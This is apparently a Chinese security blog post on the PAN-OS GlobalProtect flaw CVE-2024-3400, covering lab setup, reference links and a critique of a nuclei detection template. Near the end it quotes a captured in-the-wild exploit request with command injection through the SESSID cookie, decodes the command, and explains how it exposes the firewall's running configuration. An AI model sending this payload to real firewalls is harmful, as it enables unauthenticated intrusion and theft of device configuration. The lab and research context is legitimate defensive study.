Palo Alto PAN-OS最近出了个的洞,也就是CVE-2024-3400,从网上找资源要花费不少功夫,有很多朋友微信问我,因此以下就简单记录一下。
值得一提的是,本公众号追梦信安有留言功能啦,大家可以直接在底下留言!
一、漏洞环境下载
1. EVE-NG(qemu)搭建
1.1 eve-ng下载
eve-ng下载地址:
https://www.eve-ng.net/index.php/download/
有人测试时发现Paloalto防火墙10.2.3版本在EVE-NG环境中有Bug,无法正常启动
1.2 漏洞镜像下载
https://pan.baidu.com/s/1xpMmgGIygV47IGTYtlIpGQ?pwd=3egb
这里面有很多镜像:
其中Palo Alto的如下:
paloalto-10.2.5-Pre-Licensed-Eval.tgz这个预验证的,进去就有30天使用。
但是需要注意的是内存要给到5.5GB以上,否则跑不了,eve虚拟机的内存就要更大了。
其实上面这个哥们搬运的是国外分享的,具体源链接如下:
https://github.com/hegdepavankumar/Cisco-Images-for-GNS3-and-EVE-NG
https://labhub.eu.org/zh-CN/UNETLAB%20II/addons/qemu/
2. ova导入vmware搭建
来源:https://www.emulatedlab.com/thread-2012-1-1.html
链接:https://pan.baidu.com/s/1ldxW-yEo1PodO_O8u4xblg 提取码:zbr7
需要在vmware内导入ova后在启动前用记事本打开此虚拟机的.vmx文件,删除tools.syncTime = "true",在末尾添加添加:
tools.syncTime = "FALSE"
time.synchronize.continue = "FALSE"
time.synchronize.restore = "FALSE"
time.synchronize.resume.disk = "FALSE"
time.synchronize.shrink = "FALSE"
time.synchronize.tools.startup = "FALSE"
rtc.startTime = 1680307200
二、漏洞环境搭建
https://www.josark.com/p/paloalto-%E9%98%B2%E7%81%AB%E5%A2%99-vpn-%E9%85%8D%E7%BD%AEipsec-globalprotect/
https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-portals/set-up-access-to-the-globalprotect-portal
https://docs.paloaltonetworks.com/pan-os/device-certificate
三、漏洞研究参考文章
https://docs.paloaltonetworks.com/pan-os/10-2/pan-os-admin/device-telemetry/device-telemetry-collection
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
https://security.paloaltonetworks.com/CVE-2024-3400
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
四、漏洞利用吐槽
nuclei的脚本明显不对:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-3400.yaml
这个poc打过去五分钟之后dnslog才可能收到相应:
判断方法还是需要通过创建0字节文件,早上我看到有个哥们提出pull request了:
https://github.com/projectdiscovery/nuclei-templates/pull/9594/files
还有就是这个洞可能需要去寻找其他组合利用方式,网上大部分目标都是不出网的,少部分dns出网,极少部分http出网。
TrustedSec的CTO(Justin Elze)也分享了捕获到的payload:
Since it's out there now this is what I caught in wild CVE-2024-3400
GET /global-protect/login.esp HTTP/1.1 Host: X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept-Encoding: gzip, deflate, br…
— Justin Elze (@HackingLZ) April 16, 2024
GET /global-protect/login.esp HTTP/1.1 Host: X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Cookie: SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`echo${IFS}dGFyIC1jemYgL3Zhci9hcHB3ZWIvc3NsdnBuZG9jcy9nbG9iYWwtcHJvdGVjdC9wb3J0YWwvanMvanF1ZXJ5Lm1heC5qcyAvb3B0L3BhbmNmZy9tZ210L3NhdmVkLWNvbmZpZ3MvcnVubmluZy1jb25maWcueG1s|base64${IFS}-d|bash${IFS}-i`
b64 decoded
tar -czf /var/appweb/sslvpndocs/global-protect/portal/js/jquery.max.js /opt/pancfg/mgmt/saved-configs/running-config.xml
这样就可以通过访问/global-protect/portal/js/jquery.max.js来读取运行时的配置了。
原文始发于微信公众号(追梦信安):PaloAlto PAN-OS新洞随记(CVE-2024-3400)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论